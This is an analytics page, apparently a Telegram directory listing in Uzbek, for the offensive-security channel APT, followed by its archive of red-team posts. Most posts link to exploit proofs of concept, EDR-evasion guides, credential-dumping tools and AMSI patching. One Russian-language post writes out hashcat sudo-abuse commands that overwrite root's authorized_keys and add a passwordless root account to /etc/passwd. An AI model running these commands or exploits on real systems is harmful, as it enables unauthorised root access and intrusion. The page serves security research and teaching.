APT

Kanalga Telegram’da o‘tish

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Ko'proq ko'rsatish

Rossiya45 663 Texnologiyalar & Aralashmalar8 841...

📈 Telegram kanali APT analitikasi

APT (@apt_notes) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 14 653 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 841-o'rinni va Rossiya mintaqasida 45 663-o'rinni egallagan.

📊 Auditoriya ko‘rsatkichlari va dinamika

невідомо sanasidan buyon loyiha tez o‘sib, 14 653 obunachiga ega bo‘ldi.

11 Iyun, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 406 ga, so‘nggi 24 soatda esa 16 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.

Tasdiqlash holati: Tasdiqlanmagan
Jalb etish (ER): Auditoriya o‘rtacha 48.83% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining N/A% ini tashkil etuvchi reaksiyalarni to‘playdi.
Post qamrovi: Har bir post o‘rtacha 7 154 marta ko‘riladi; birinchi sutkada odatda 0 ta ko‘rish yig‘iladi.
Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 18 ta reaksiya keladi.

📝 Tavsif va kontent siyosati

Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Yuqori yangilanish chastotasi (oxirgi ma’lumot 12 Iyun, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.

14 653

Obunachilar

+1624 soatlar

+1087 kunlar

+40630 kunlar

7 154

Post ko'rishlar

Ma'lumot yo'q24 soatlar

Ma'lumot yo'q48 soatlar

48.83%

Muloqot nisbati

Ma'lumot yo'q

Kuniga postlar

Ads index

beta

Postlar arxiv

14 658

🍀 MSIFortune - Local Privilege Escalation with MSI Installers MSI installers are still pretty alive today. It is a lesser known feature, that a low privileged user can start the repair function of an installation which will run with SYSTEM privileges. What could go wrong? Quite a lot! The repair function often triggers CustomActions, which can lead to several potential issues: — Visible conhost.exe via a cmd.exe or other console binaries — Visible PowerShell — Directly actions from the installer with SYSTEM privileges — Executing binaries from user writable paths — DLL sideloading / search path abusing — Missing PowerShell parameters, mostly -NoProfile — Execution of other tools in an unsafe manner 🌐 Details: https://badoption.eu/blog/2023/10/03/MSIFortune.html #windows #msi #lpe

14 658

Repost from r0 Crew (Channel)

Local Privilege Escalation in the glibc's ld.so (CVE-2023-4911) https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt POC: https://github.com/leesh3288/CVE-2023-4911 #expdev #linux #lpe #Alexs3y

14 658

Repost from 1N73LL1G3NC3

NetExec This tool is based on CrackMapExec and was originally created by bytebleeder and maintained by mpgn over the years, shout out to them! With the retirement of mpgn, we decided to maintain the tool NetExec, formerly known as CrackMapExec, as a completely free open source tool. Today will be our first release of NetExec version 1.0.0 NetExec wiki

14 658

🔒 Protected Users and xfreerdp By default xfreerdp does not support Kerberos authentication. As such you'll have to recompile it specifying the WITH_GSSAPI option. Also you'll need the libkrb5-dev package to handle TGT/ST requests :) #ad #kerberos #xfreerdp #redteam

14 658

➡️ Local Admin to Domain Admin Ask a TGS on behalf of another user without password. Scenario: you are Local Administrator and there is a logged User you want to Impersonate! 🌐 Source: https://github.com/foxlox/GIUDA #ad #kerberos #tgs #perl

14 658

⚙️ Windows LPE in driver MSKSSRV.SYS CVE-2023-29360 is a Local Privilege Escalation (LPE) vulnerability found in the mskssrv driver. It allows attackers to gain direct access to kernel memory by exploiting improper validation of a user-supplied value. 🌐 PoC: https://github.com/Nero22k/cve-2023-29360 📝 Research: https://big5-sec.github.io/posts/CVE-2023-29360-analysis/ #windows #lpe #driver #mskssrv

14 658

Repost from Ralf Hacker Channel

CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege https://github.com/Chocapikk/CVE-2023-29357/tree/main #exploit #pentest #redteam #git

14 658

⚙ WTS API Wasteland — Token Impersonation In Another Level A new research about a technique for lateral movement by stealing tokens while abusing the RPC named pipe

\\pipe\LSM_API_service

🌐 PoC: https://github.com/OmriBaso/WTSImpersonator 📝 Research: https://medium.com/@omribaso/wts-api-wasteland-remote-token-impersonation-in-another-level-a23965e8227e #ad #windows #token #impersonate

14 658

🔤 Fileless RCE on Juniper Firewalls A recently discovered vulnerability, CVE-2023-36845, affects Juniper SRX firewalls and EX switches, allowing for remote code execution without writing to the disk 🔍 Scanner: https://github.com/vulncheck-oss/cve-2023-36845-scanner 🌐 Research: https://vulncheck.com/blog/juniper-cve-2023-36845 #juniper #rce #cve

14 658

😈 POSTDump This is the C# / .NET implementation of the ReactOS minidump function (like nanodump), thus avoiding call to the Windows API MiniDumpWriteDump function. 🚀 Key Features: — Usage of indirect syscall along with halo's gate technic to retrieve syscalls IDs — No memory Allocation/Protection call is performed for indirect syscall, instead, free RWX codecave found in the current process are used — ETW patching — No call to MiniDumpWriteDump 🌐 Source: https://github.com/YOLOP0wn/POSTDump #windows #lsass #dump #syscall #reactos

14 658

Repost from 1N73LL1G3NC3

Caro-Kann Encrypted shellcode Injection to avoid Kernel triggered memory scans https://github.com/S3cur3Th1sSh1t/Caro-Kann

14 658

Repost from Offensive Xwitter

😈 [ Clandestine @akaclandestine ] 𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾 🔗 Part 1 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5 🔗 Part 2 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354 🔗 Part 3 - https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7 🔗 Part 4 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e 🐥 [ tweet ]

14 658

🔄 Active Directory GPOs through NTLM relaying, and more! Learn about a attack vector that exploits GPOs through NTLM relaying, potentially allowing unauthenticated attackers to abuse. 🌐 Source: https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more #ad #gpo #relay #ntlm

14 658

Repost from 1N73LL1G3NC3

CVE-2023-28229 Service Elevation of Privilege Vulnerability in Windows CNG Key Isolation https://github.com/Y3A/CVE-2023-28229 Reference: https://whereisk0shl.top/post/isolate-me-from-sandbox-explore-elevation-of-privilege-of-cng-key-isolation

14 658

🐱 GTFOBins в Hashcat Сегодня мы рассмотрим достаточно интересный (и в какой то степени банальный) способ как можно использовать Hashcat для обхода локальных ограничений безопасности. Предположим, у нас есть низко привилегированный доступ к Linux системе под пользователем "Acrono", и этот пользователь имеет права root для выполнения команды Hashcat без ввода пароля:

(root) NOPASSWD: /usr/bin/hashcat -m

Мы можем воспользоваться этой привилегией в Hashcat, взяв MD5-сумму от необходимой нами строки, после чего перебирая хеш по известному "словарю" и записывая вывод в определенный файл. 🐚 SSH Abuse Данная атака позволит нам добавить наш SSH-ключ в список авторизованных ключей root, обойдя парольную аутентификацию:

key='<PUBLIC_SSH_KEY>'
echo -n "$key" > wordlist && echo -n "$key" | md5sum | awk '{print $1}' > hash
sudo hashcat -m 0 -a 0 --quiet --potfile-disable -o /root/.ssh/authorized_keys --outfile-format=2 hash wordlist
ssh -i ./id_ed25519 root@127.0.0.1

🔑 Passwd Abuse Данная атака позволяет создать нового пользователя без пароля с правами root в файле /etc/passwd:



create_user='pwn-user::0:0:root:/root:/bin/bash'
echo -n "$create_user" > wordlist && echo -n "$create_user" | md5sum | awk '{print $1}' > hash
sudo hashcat -m 0 -a 0 --quiet --potfile-disable -o /etc/passwd --outfile-format=2 --outfile-autohex-disable hash wordlist
su - pwn-user

Кстати, немногие знают, что Hashcat поддерживает режим "сервера". Если у вас есть пароль от сервера и вы наверняка знаете, что сервер работает от привилегированного пользователя, то SSH Abuse может оказаться полезным:

hashcat --brain-server --brain-host=0.0.0.0 --brain-port=1337 --brain-password=P@ssw0rd

P.S. Вероятность получить подобные привилегии в реальной жизни крайне мала, однако я лично столкнулся с этим не так давно. Я также не смог найти в интернетах похожего абуза, потому и решил опубликовать данный пост.

14 658

Repost from Ralf Hacker Channel

Хорошая статья от MDSec, как они "редтимили" разработчиков. Наиболее интересный момент - это разработка и публикация вредоносного расширения VSCode для фишинга и получения первоначального доступа. https://www.mdsec.co.uk/2023/08/leveraging-vscode-extensions-for-initial-access/ #redteam #pentest #pishing #initial

14 658

Repost from Ralf Hacker Channel

WinRAR <= 6.22: code execution PoC https://github.com/b1tg/CVE-2023-38831-winrar-exploit #git #exploit #pentest #redteam #fishing #initial

14 658

⚔️ GitLab CE/EE Preauth RCE (CVE-2021-22205) An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. ❗️Affect Versions:

>=11.9, <13.8.8
>=13.9, <13.9.6
>=13.10, <13.10.3

🌐 Source: https://github.com/inspiringz/CVE-2021-22205 #gitlab #rce #cve

14 658

Repost from RedTeam brazzers

Недавно нашел интересную функцию DebugActiveProcess , которая позволяет текущему процессу стать дебаггером (обрабатывать всякие дебаг события) для другого процесса. Ну и в голову пришла идея: "А что если применить это на powershell и обрабатывать LOAD_DLL_DEBUG_EVENT, перехватывать загрузку amsi.dll и патчить ее на лету?" . Таким образом родился проект DebugAmsi , который позволяет запускать процесс powershell.exe с автоматическим патчем amsi. Причем я постарался избавить Вас от нужды чистки строк, обфускации их и прочей жести. В файлике strhide реализован алгоритм по шифрованию всех строк проекта во время компиляции с помощью XOR. Алгоритм вынесен в два отдельных милых макроса - h() (для шифрования ASCII строк) и hW() (для шифрования юникода). Пользуйтесь на здоровье😚

14 658

⚛️ Nuclei Templates AI Generator Nuclei Template Editor - AI-powered hub to create, debug, scan, and store templates. Covering a wide array of vulnerabilities using public templates & rich CVE data. 📝 Note: Current focus is HTTP, more protocols coming soon 🌐 Source: https://templates.nuclei.sh https://docs.nuclei.sh/editor #nuclei #template #generator